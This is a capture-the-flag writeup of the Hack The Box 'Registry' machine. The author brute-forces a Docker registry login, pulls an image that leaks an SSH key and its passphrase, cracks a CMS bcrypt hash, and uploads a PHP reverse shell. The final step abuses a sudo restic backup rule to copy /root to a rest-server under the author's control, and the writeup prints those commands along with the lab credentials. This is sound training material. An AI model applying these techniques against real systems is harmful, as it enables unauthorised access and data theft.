[HTB] Registry Writeup
Introduction
Hello and welcome to my writeup for registry, very well designed box, enjoyed every part of it.
Service Enumeration
Checking available services with a classic nmap
# Nmap 7.80 scan initiated Thu Nov 28 19:42:42 2019 as: nmap -sC -sV -oA box -Pn box
Nmap scan report for box (10.10.10.159)
Host is up (0.094s latency).
rDNS record for 10.10.10.159: Registery.htb
Not shown: 996 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 72:d4:8d:da:ff:9b:94:2a:ee:55:0c:04:30:71:88:93 (RSA)
| 256 c7:40:d0:0e:e4:97:4a:4f:f9:fb:b2:0b:33:99:48:6d (ECDSA)
|_ 256 78:34:80:14:a1:3d:56:12:b4:0a:98:1f:e6:b4:e8:93 (ED25519)
80/tcp open http nginx 1.14.0 (Ubuntu)
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: Welcome to nginx!
443/tcp open ssl/http nginx 1.14.0 (Ubuntu)
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: Welcome to nginx!
| ssl-cert: Subject: commonName=docker.registry.htb
| Not valid before: 2019-05-06T21:14:35
|_Not valid after: 2029-05-03T21:14:35
13456/tcp filtered unknown
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Nov 28 19:43:22 2019 -- 1 IP address (1 host up) scanned in 40.27 seconds
Web Enumeration
Home have nginx default on port 80, but trying 443 we notice that https://registry.htb use SSL certificate that contains this host : docker.registry.htb
Appended it to /etc/hosts.
Started a gobuster instance with a medium wordlist.
root@Zakali:~/ROOTED/Registry# gobuster dir -u http://registry.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://registry.htb
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2019/11/28 02:21:25 Starting gobuster
===============================================================
/install (Status: 301)
/bolt (Status: 301)
Progress: 50404 / 220561 (22.85%)^C
/boltcontain default CMS page, nothing intresting pops up./installcontain what appears to be random data at first.
But if use wget to pull cleanly the file, we could notice its actually a sneaky gzip, but the server is serving the file as a text meme type.
root@Zakali:~/ROOTED/Registry# wget http://registry.htb/install
--2020-04-03 02:34:46-- http://registry.htb/install
Resolving registry.htb (registry.htb)... 10.10.10.159
Connecting to registry.htb (registry.htb)|10.10.10.159|:80... connected.
HTTP request sent, awaiting response... 301 Moved Permanently
Location: http://registry.htb/install/ [following]
--2020-04-03 02:34:46-- http://registry.htb/install/
Reusing existing connection to registry.htb:80.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
Saving to: ‘install’
install [ <=> ] 1.03K --.-KB/s in 0s
2020-04-03 02:34:46 (34.3 MB/s) - ‘install’ saved [1050]
root@Zakali:~/ROOTED/Registry# file install
install: gzip compressed data, last modified: Mon Jul 29 23:38:20 2019, from Unix, original
size modulo 2^32 167772200 gzip compressed data, reserved method, has CRC, was "",
from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 167772200
Extracting the gzip, we get both a certificate, and links to a docker documention about registry and certificates.
root@Zakali:~/ROOTED/Registry/Docs/a# tar xzvf install.gz
gzip: stdin: unexpected end of file
ca.crt
readme.md
tar: Child returned status 1
tar: Error is not recoverable: exiting now
root@Zakali:~/ROOTED/Registry/Docs/a# ls
ca.crt install.gz readme.md
root@Zakali:~/ROOTED/Registry/Docs/a#
root@Zakali:~/ROOTED/Registry/Docs/a# cat readme.md
# Private Docker Registry
- https://docs.docker.com/registry/deploying/
- https://docs.docker.com/engine/security/certificates/
root@Zakali:~/ROOTED/Registry/Docs/a# cat ca.crt
-----BEGIN CERTIFICATE-----
MIIC/DCCAeSgAwIBAgIJAIFtFmFVTwEtMA0GCSqGSIb3DQEBCwUAMBMxETAPBgNV
BAMMCFJlZ2lzdHJ5MB4XDTE5MDUwNjIxMTQzNVoXDTI5MDUwMzIxMTQzNVowEzER
MA8GA1UEAwwIUmVnaXN0cnkwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB
AQCw9BmNspBdfyc4Mt+teUfAVhepjje0/JE0db9Iqmk1DpjjWfrACum1onvabI/5
T5ryXgWb9kS8C6gzslFfPhr7tTmpCilaLPAJzHTDhK+HQCMoAhDzKXikE2dSpsJ5
zZKaJbmtS6f3qLjjJzMPqyMdt/i4kn2rp0ZPd+58pIk8Ez8C8pB1tO7j3+QAe9wc
r6vx1PYvwOYW7eg7TEfQmmQt/orFs7o6uZ1MrnbEKbZ6+bsPXLDt46EvHmBDdUn1
zGTzI3Y2UMpO7RXEN06s6tH4ufpaxlppgOnR2hSvwSXrWyVh2DVG1ZZu+lLt4eHI
qFJvJr5k/xd0N+B+v2HrCOhfAgMBAAGjUzBRMB0GA1UdDgQWBBTpKeRSEzvTkuWX
8/wn9z3DPYAQ9zAfBgNVHSMEGDAWgBTpKeRSEzvTkuWX8/wn9z3DPYAQ9zAPBgNV
HRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBCwUAA4IBAQABLgN9x0QNM+hgJIHvTEN3
LAoh4Dm2X5qYe/ZntCKW+ppBrXLmkOm16kjJx6wMIvUNOKqw2H5VsHpTjBSZfnEJ
UmuPHWhvCFzhGZJjKE+An1V4oAiBeQeEkE4I8nKJsfKJ0iFOzjZObBtY2xGkMz6N
7JVeEp9vdmuj7/PMkctD62mxkMAwnLiJejtba2+9xFKMOe/asRAjfQeLPsLNMdrr
CUxTiXEECxFPGnbzHdbtHaHqCirEB7wt+Zhh3wYFVcN83b7n7jzKy34DNkQdIxt9
QMPjq1S5SqXJqzop4OnthgWlwggSe/6z8ZTuDjdNIpx0tF77arh2rUOIXKIerx5B
-----END CERTIFICATE-----
Registry Enumeration
Here is my thought process, the box name is registry, and we get plenty of hints that its using docker, and knowing that a registry is like a place where we can stock docker images, so there is probably a registry service running on the host.
root@Zakali:~/ROOTED/Registry# docker login docker.registry.htb
Username:
Error: Non-null Username Required
Attempting to connect to it triggers a authentication errors, hence it confirms the presence of that service and make you look for the creds, immediatly brute force is with hydra.
root@Zakali:~/Registry# hydra -L usernames -P /usr/share/wordlists/fasttrack.txt docker.registry.htb http-get /v2/_catalog
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2019-11-29 17:12:34
[DATA] max 16 tasks per 1 server, overall 16 tasks, 5328 login tries (l:24/p:222), ~333 tries per task
[DATA] attacking http-get://docker.registry.htb:80/v2/_catalog
[80][http-get] host: docker.registry.htb login: admin password: admin
[STATUS] 2200.00 tries/min, 2200 tries in 00:01h, 3128 to do in 00:02h, 16 active
^CThe session file ./hydra.restore was written. Type "hydra -R" to resume session.
Great, we got creds, once again, its good to try default creds before of bruteforcing, should have done that, but that works too.
root@Zakali:~/ROOTED/Registry# docker login docker.registry.htb -u admin -p admin WARNING! Using --password via the CLI is insecure. Use --password-stdin.
INFO[0000] Error logging in to v2 endpoint, trying next endpoint: Get https://docker.registry.htb/v2/: x509: certificate signed by unknown authority
Get https://docker.registry.htb/v2/: x509: certificate signed by unknown authority
I managed to attempt again to login but we got a new error this time, a cert error! That cert file will probably be used to log in, after more googling, got two intrestings links that help me use that cert and fix the error, two relvant manual pages:
Now we know the path of where to put it which is /etc/docker/certs.d/docker.registry.htb
root@Zakali:~# cat /etc/docker/certs.d/docker.registry.htb/ca.crt
-----BEGIN CERTIFICATE-----
MIIC/DCCAeSgAwIBAgIJAIFtFmFVTwEtMA0GCSqGSIb3DQEBCwUAMBMxETAPBgNV
BAMMCFJlZ2lzdHJ5MB4XDTE5MDUwNjIxMTQzNVoXDTI5MDUwMzIxMTQzNVowEzER
MA8GA1UEAwwIUmVnaXN0cnkwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB
AQCw9BmNspBdfyc4Mt+teUfAVhepjje0/JE0db9Iqmk1DpjjWfrACum1onvabI/5
T5ryXgWb9kS8C6gzslFfPhr7tTmpCilaLPAJzHTDhK+HQCMoAhDzKXikE2dSpsJ5
zZKaJbmtS6f3qLjjJzMPqyMdt/i4kn2rp0ZPd+58pIk8Ez8C8pB1tO7j3+QAe9wc
r6vx1PYvwOYW7eg7TEfQmmQt/orFs7o6uZ1MrnbEKbZ6+bsPXLDt46EvHmBDdUn1
zGTzI3Y2UMpO7RXEN06s6tH4ufpaxlppgOnR2hSvwSXrWyVh2DVG1ZZu+lLt4eHI
qFJvJr5k/xd0N+B+v2HrCOhfAgMBAAGjUzBRMB0GA1UdDgQWBBTpKeRSEzvTkuWX
8/wn9z3DPYAQ9zAfBgNVHSMEGDAWgBTpKeRSEzvTkuWX8/wn9z3DPYAQ9zAPBgNV
HRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBCwUAA4IBAQABLgN9x0QNM+hgJIHvTEN3
LAoh4Dm2X5qYe/ZntCKW+ppBrXLmkOm16kjJx6wMIvUNOKqw2H5VsHpTjBSZfnEJ
UmuPHWhvCFzhGZJjKE+An1V4oAiBeQeEkE4I8nKJsfKJ0iFOzjZObBtY2xGkMz6N
7JVeEp9vdmuj7/PMkctD62mxkMAwnLiJejtba2+9xFKMOe/asRAjfQeLPsLNMdrr
CUxTiXEECxFPGnbzHdbtHaHqCirEB7wt+Zhh3wYFVcN83b7n7jzKy34DNkQdIxt9
QMPjq1S5SqXJqzop4OnthgWlwggSe/6z8ZTuDjdNIpx0tF77arh2rUOIXKIerx5B
-----END CERTIFICATE-----
And we are finally loged in.
root@Zakali:~# docker login https://docker.registry.htb -u admin -p admin
WARNING! Using --password via the CLI is insecure. Use --password-stdin.
WARNING! Your password will be stored unencrypted in /root/.docker/config.json.
Configure a credential helper to remove this warning. See
https://docs.docker.com/engine/reference/commandline/login/#credentials-store
Login Succeeded
Let’s see what this registry has to offer:
root@Zakali:~# docker search docker.registry.htb
NAME DESCRIPTION STARS OFFICIAL AUTOMATED
evandrix/htb-registry-bolt-image docker.registry.htb:443/bolt-image 0
Docker Image Enumeration
Great there is an image! let’s pull it.
root@Zakali:~# docker pull docker.registry.htb/bolt-image
We then run a bash instance inside the container.
root@Zakali:~# docker run -it docker.registry.htb/bolt-image bash
root@e45cbfa3189a:/#
Using classic privelage “escalation” techniques, we spot a juicy encrypted ssh private key, paired with a public one that leaks the user, on root’s ssh folder.
root@e45cbfa3189a:/# head /root/.ssh/id_rsa.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQDQ0QB2PXyb2AUShspjygtkqjzXFuX0dbayPI/irOEYCAOtgQs+nb9Ij3vZZX
+LMPpNtWJaGF+ti/5gTjnhfjyNji7L/3Se6aIJAqMlFqkf+E5xKntRlM9dpqMMNRLgAYAKW5lj5OciQ7ZaXx7btoYLiQHlxXbj
8RwEirWuFqwbi2lznckAU9Ua1DSu6yKdqIIpkB2FvJVFakTS32FagJ+rGm9TIWeiOPaQvKhyXQ0jeBL4Sdi5PmhLtkdOEWVgYVSoWaOythA3J2c1UAhfl5dLGS0FuD4Dv46xyrI8H7gpAexa1yF3Kei4PTHBEIQxscejsfCEOVZwe4sngYKrU7o6sf0rWpOf7jHuEUMCZVQgQ55fvv10P6CA2qhPQ/bpKzp2pGXRb1Xdr6v+ObgQ4knkK1GKqOegOane0wyhD5RFQF/NeYBqt1UIM2KigDv9foENc7p9HhHGFoWJEzyOeWCm4QcSg9H2ZgfZRAhCoiEijHh19SdNh9wanydkaj9H7iTsvNDi8ON4sLRGjVBsfPLl+UjIIsHU+bG+pxHUzb65yHJ8iFX+DndJncdbQs6X9Ckii58ElBmkSUDSZpFsOV81vVk6qdGm+EBcpVO09YsC03nUj1VEHtQG8hOG/t
JqesB50I5Gbi7+V2qZit3ZZOvkhVF5l2N0U9asjSpIT5Bmow== bolt@registry.htb
root@e45cbfa3189a:/# head /root/.ssh/id_rsa
head /root/.ssh/id_rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,1C98FA248505F287CCC597A59CF83AB9
KF9YHXRjDZ35Q9ybzkhcUNKF8DSZ+aNLYXPL3kgdqlUqwfpqpbVdHbMeDk7qbS7w
KhUv4Gj22O1t3koy9z0J0LpVM8NLMgVZhTj1eAlJO72dKBNNv5D4qkIDANmZeAGv
7RwWef8FwE3jTzCDynKJbf93Gpy/hj/SDAe77PD8J/Yi01Ni6MKoxvKczL/gktFL
/mURh0vdBrIfF4psnYiOcIDCkM2EhcVCGXN6BSUxBud+AXF0QP96/8UN8A5+O115
p7eljdDr2Ie2LlF7dhHSSEMQG7lUqfEcTmsqSuj9lBwfN22OhFxByxPvkC6kbSyH
XnUqf+utie21kkQzU1lchtec8Q4BJIMnRfv1kufHJjPFJMuWFRbYAYlL7ODcpIvt
More Enumeration and we spot another script that contain the passphrase to private ssh key.
root@e45cbfa3189a:/etc# cat /etc/profile.d/01-ssh.sh
#!/usr/bin/expect -f
#eval `ssh-agent -s`
spawn ssh-add /root/.ssh/id_rsa
expect "Enter passphrase for /root/.ssh/id_rsa:"
send "GkOcz221Ftb3ugog\n";
expect "Identity added: /root/.ssh/id_rsa (/root/.ssh/id_rsa)"
interact
And boom we got user, one hell of a ride.
root@Zakali:~/ROOTED/Registry/User# ssh bolt@registry.htb -i id_rsa
The authenticity of host 'registry.htb (10.10.10.159)' can't be established.
ECDSA key fingerprint is SHA256:G1J5ek/T6KuCCT7Xp2IN1LUslRt24mhmhKUo/kWWVrs.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'registry.htb,10.10.10.159' (ECDSA) to the list of known hosts.
Enter passphrase for key 'id_rsa':
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-65-generic x86_64)
System information as of Fri Apr 3 02:48:45 UTC 2020
System load: 0.0 Users logged in: 0
Usage of /: 5.6% of 61.80GB IP address for eth0: 10.10.10.159
Memory usage: 31% IP address for br-1bad9bd75d17: 172.18.0.1
Swap usage: 1% IP address for docker0: 172.17.0.1
Processes: 155
Last login: Fri Apr 3 00:01:05 2020 from 10.10.14.180
bolt@bolt:~$ md5sum user.txt
e4310f784ddfbd1a743f67bafaf78a98 user.txt
Previlege Descalation
Was curious if the user was running inside a container or on the box host, was able to confirm that we are not inside container with this link.
#Prolly outside a docker container
bolt@bolt:/tmp/aaa$ cat /proc/1/cgroup
12:cpu,cpuacct:/
11:cpuset:/
10:memory:/
9:devices:/
8:hugetlb:/
7:rdma:/
6:blkio:/
5:pids:/
4:freezer:/
3:perf_event:/
2:net_cls,net_prio:/
1:name=systemd:/init.scope
0::/init.scope
With the user access, I run the default linux previlege escalation script LinEnum, noticed the path for the CMS and started my enumeration there. After some time, I noticed the db, and decided to run strings on it.
root@Zakali:~/ROOTED/Registry/User# scp -i id_rsa ~/Tools/public/LinEnum.sh bolt@registry.htb:/tmp
Enter passphrase for key 'id_rsa':
LinEnum.sh 100% 45KB 14.2KB/s 00:03
bolt@bolt:/var/www/html/bolt/app/database$ strings bolt.db | grep admin
KK��2�/3%=3admin$2y$10$e.ChUytg9SrL7AsboF2bX.wWKQ1LkS5Fi3/Z0yYD86.P5E9cpY7PKbolt@registry.htb2019-12-01 05:01:0210.10.14.225Admin["files://webshell.php"]["root","everyone"]
�� admin
��/ bolt@registry.htb
��
3admin$2y$10$e.ChUytg9SrL7AsboF2bX.wWKQ1LkS5Fi3/Z0yYD86.P5E9cpY7PKbolt@registry.htb2019-12-01 05:01:0210.10.14.225Admin["files://webshell.php"]["root","everyone"]
admin
We got the CMS admin hash, lets crack it with john and rockyou wordlist.
root@Zakali:~/ROOTED/Registry/User/www-data# cat admin-hash
admin:$2y$10$e.ChUytg9SrL7AsboF2bX.wWKQ1LkS5Fi3/Z0yYD86.P5E9cpY7PK
root@Zakali:~/Registry/User/www-data# john -w=/usr/share/wordlists/rockyou.txt admin-hash
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 3 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
strawberry (admin)
1g 0:00:00:07 DONE (2019-12-01 22:34) 0.1367g/s 48.01p/s 48.01c/s 48.01C/s strawberry..lorena
Use the "--show" option to display all of the cracked passwords reliably
Session completed
Wierdly enough, I was not able to find the admin login page, so I decided to check out the nginx website deployement config.
bolt@bolt:/etc/nginx$ cat sites-enabled/01.registry.conf
server {
listen 80;
listen [::]:80;
listen 443 ssl;
include snippets/self-signed.conf;
include snippets/ssl-params.conf;
root /var/www/html;
index index.php index.html;
server_name registry.htb;
location = /bolt/app/database/bolt.db {
deny all;
return 404;
}
location = /bolt/bolt {
try_files $uri $uri/ /bolt/index.php?$query_string;
}
location ^~ /bolt/bolt/ {
try_files $uri /bolt/index.php?$query_string;
}
location ^~ /bolt/(.*)$ {
try_files $uri $uri/ /bolt/index.php?$query_string;
}
location ~ \.php$ {
include snippets/fastcgi-php.conf;
fastcgi_pass unix:/var/run/php/php7.2-fpm.sock;
}
location ~ /\.ht {
deny all;
}
}
Visiting /bolt/bolt instead of bolt/login and we are in the CMS login panel.
Well, was a bit confused at first, since we have user, and the CMS is controlled by www-data which is a lower privelege than user in general, seemed to be backwards, nothing pointed me that focusing on the CMS will help get root, but the idea is to have as much controll on the machine as possible, and getting that shell is a way to increase control. After attempting to upload a reverse shell php, I noticed that it does not allow that meme type, so I went to change the config to allow it.
After allowing php, uploading the php reverse shell, and triggering it by visiting it, we get www-data. (it had to be done fast, later noticed there is a cron cleaning to avoid spoilers for other players)
And we get a clean shell as www-data.
Previlege Escalation (root)
Let’s see what we can run :
www-data@bolt:~/html$ sudo -l
Matching Defaults entries for www-data on bolt:
env_reset, exempt_group=sudo, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on bolt:
(root) NOPASSWD: /usr/bin/restic backup -r rest*
AHA! we can escalate to root somehow using a curious program named restic that is used to do password protected backups, more info about it here.
To be able to abuse this, I needed to master the usage of restic, and find a way to consider a usage that will allow me to escalate, rapid protyping on local and eating the documentation, made me realise that there is roughly 3 phases:
Initiating a backup instance on a folder or a remote server
restic init -r instance
Using that backup instance to store data
restic backup -r instance WHAT
And finaly restore the backuped data
restic restore Snapshot_id -r instance --target WHERE
The sudoed command is the backup one, so we are able to backup any file we want on the host as root, and be able to restore it as a regular user, potentially able to read the whole system. To be able to change from one user to another when we do backups, its better to use a remote server as a backup instance instead of a folder.
Exploitation
Copy restic server to registry.htb
scp -i id_rsa /root/Registry/www-data/rest-server/bi/bin bolt@registry.htb:/tmp/.aa
Start the server as user
bolt@bolt:/tmp/.aa$ ls
bin
bolt@bolt:/tmp/.aa$ chmod +x bin
bolt@bolt:/tmp/.aa$ ./bin --no-auth --path .
Data directory: .
Authentication disabled
Private repositories disabled
Starting server on :8000
Init a repo as www-data on the remote server
www-data@bolt:~/html$ ls
backup.php bolt index.html index.nginx-debian.html install
www-data@bolt:~/html$ restic init -r rest:http://registry.htb:8000
enter password for new repository:
enter password again:
created restic repository 8feaba0e5e at rest:http://registry.htb:8000
Please note that knowledge of your password is required to access
the repository. Losing your password means that your data is
irrecoverably lost.
Backup the whole root folder as www-data
www-data@bolt:~/html$ sudo restic backup -r rest:http://localhost:8000 /root
enter password for repository:
password is correct
found 2 old cache directories in /var/www/.cache/restic, pass --cleanup-cache to remove them
scan [/root]
scanned 10 directories, 14 files in 0:00
[0:00] 100.00% 28.066 KiB / 28.066 KiB 24 / 24 items 0 errors ETA 0:00
duration: 0:00
snapshot 4b5b25b7 saved
Restoring the backuped data as user
bolt@bolt:/tmp/.aa$ restic snapshots -r .
enter password for repository:
password is correct
ID Date Host Tags Directory
----------------------------------------------------------------------
4b5b25b7 2019-12-03 07:35:31 bolt /root
----------------------------------------------------------------------
1 snapshots
bolt@bolt:/tmp/.aa$ restic restore 4 -r . --target .
enter password for repository:
password is correct
restoring <Snapshot 4b5b25b7 of [/root] at 2019-12-03 07:35:31.243300115 +0000 UTC by root@bolt> to .
ignoring error for /root/.bash_history: Lchown: lchown /tmp/.aa/root/.bash_history: operation not permitted
ignoring error for /root/.bashrc: Lchown: lchown /tmp/.aa/root/.bashrc: operation not permitted
ignoring error for /root/.cache/motd.legal-displayed: Lchown: lchown /tmp/.aa/root/.cache/motd.legal-displayed: operation not permitted
ignoring error for /root/.cache: Lchown: lchown /tmp/.aa/root/.cache: operation not permitted
ignoring error for /root/.config/composer/keys.dev.pub: Lchown: lchown /tmp/.aa/root/.config/composer/keys.dev.pub: operation not permitted
ignoring error for /root/.config/composer/keys.tags.pub: Lchown: lchown /tmp/.aa/root/.config/composer/keys.tags.pub: operation not permitted
ignoring error for /root/.config/composer: Lchown: lchown /tmp/.aa/root/.config/composer: operation not permitted
ignoring error for /root/.config: Lchown: lchown /tmp/.aa/root/.config: operation not permitted
ignoring error for /root/.gnupg/private-keys-v1.d: Lchown: lchown /tmp/.aa/root/.gnupg/private-keys-v1.d: operation not permitted
ignoring error for /root/.gnupg: Lchown: lchown /tmp/.aa/root/.gnupg: operation not permitted
ignoring error for /root/.local/share/nano: Lchown: lchown /tmp/.aa/root/.local/share/nano: operation not permitted
ignoring error for /root/.local/share: Lchown: lchown /tmp/.aa/root/.local/share: operation not permitted
ignoring error for /root/.local: Lchown: lchown /tmp/.aa/root/.local: operation not permitted
ignoring error for /root/.profile: Lchown: lchown /tmp/.aa/root/.profile: operation not permitted
ignoring error for /root/.selected_editor: Lchown: lchown /tmp/.aa/root/.selected_editor: operation not permitted
ignoring error for /root/.ssh/authorized_keys: Lchown: lchown /tmp/.aa/root/.ssh/authorized_keys: operation not permitted
ignoring error for /root/.ssh/id_rsa: Lchown: lchown /tmp/.aa/root/.ssh/id_rsa: operation not permitted
ignoring error for /root/.ssh/id_rsa.pub: Lchown: lchown /tmp/.aa/root/.ssh/id_rsa.pub: operation not permitted
ignoring error for /root/.ssh: Lchown: lchown /tmp/.aa/root/.ssh: operation not permitted
ignoring error for /root/.wget-hsts: Lchown: lchown /tmp/.aa/root/.wget-hsts: operation not permitted
ignoring error for /root/config.yml: Lchown: lchown /tmp/.aa/root/config.yml: operation not permitted
ignoring error for /root/cron.sh: Lchown: lchown /tmp/.aa/root/cron.sh: operation not permitted
ignoring error for /root/root.txt: Lchown: lchown /tmp/.aa/root/root.txt: operation not permitted
ignoring error for /root: Lchown: lchown /tmp/.aa/root: operation not permitted
There were 24 errors
bolt@bolt:/tmp/.aa$ ls
bin config data index keys locks root snapshots
bolt@bolt:/tmp/.aa$ cd root/
bolt@bolt:/tmp/.aa/root$ ls
config.yml cron.sh root.txt
bolt@bolt:/tmp/.aa/root$ cat root.txt
ntrkz#########################gw
Boom, we got root flag. It wasnt that easy when got to this point, someone had a script running that delete the root flag on each bloody reset, and spend 1 WHOLE DAY enumerating beyond the intended, oh man those were dark times, until I pinged someone on the forum and told me the flag was there as usual, proper sleep and we got the flag the next day.
Loved that box, was highly fun.
tags: